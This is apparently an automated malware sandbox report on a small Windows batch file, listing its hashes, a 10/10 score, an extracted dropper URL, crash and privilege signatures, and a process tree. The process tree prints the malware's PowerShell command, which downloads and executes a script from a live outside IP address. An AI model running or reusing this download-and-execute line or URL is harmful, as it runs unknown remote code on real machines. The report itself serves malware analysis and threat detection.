4792e10c28499b9868f31d6a7dd670cf12a22f14d11a7b0bb8c781289743eed7 | Triage

Analysis

max time kernel
114s
max time network
137s
platform
windows10_x64
resource
win10v200430
submitted
08-06-2020 00:10

Sharing

Report Analysis Logs

General

Target

834fe3c10a5c6788c12a8dfd6b3a22bc.bat
Size

219B
MD5

9aeae02203b8a1236ef5aa06a8df49df
SHA1

f33e529e1dd812bd81e80fcc6b08c5d019184c74
SHA256

4792e10c28499b9868f31d6a7dd670cf12a22f14d11a7b0bb8c781289743eed7
SHA512

fdfe723f2cbf8c3f3b1a8b4211955bc60bf24f98ac81a719821e52ed5883cbdbf8b872107b5b4ae1ae5f3a6477f201f59c9452641624f4f06a61358b8013dc6e

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/834fe3c10a5c6788c12a8dfd6b3a22bc

Signatures

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3688 2812 WerFault.exe powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

WerFault.exe

description pid process

Token: SeRestorePrivilege 3688 WerFault.exe
Token: SeBackupPrivilege 3688 WerFault.exe
Token: SeDebugPrivilege 3688 WerFault.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

WerFault.exe

pid	process
3688	WerFault.exe
3688	WerFault.exe
3688	WerFault.exe
3688	WerFault.exe
3688	WerFault.exe
3688	WerFault.exe
3688	WerFault.exe
3688	WerFault.exe
3688	WerFault.exe
3688	WerFault.exe
3688	WerFault.exe
3688	WerFault.exe
3688	WerFault.exe
3688	WerFault.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\834fe3c10a5c6788c12a8dfd6b3a22bc.bat"
1⤵
PID:2532

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/834fe3c10a5c6788c12a8dfd6b3a22bc');Invoke-XMIUQZERWSSC;Start-Sleep -s 10000"
2⤵
PID:2812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2812 -s 704
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3688

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3688-0-0x0000000004B60000-0x0000000004B61000-memory.dmp

Filesize
4KB

Download
memory/3688-2-0x0000000005310000-0x0000000005311000-memory.dmp

Filesize
4KB

Download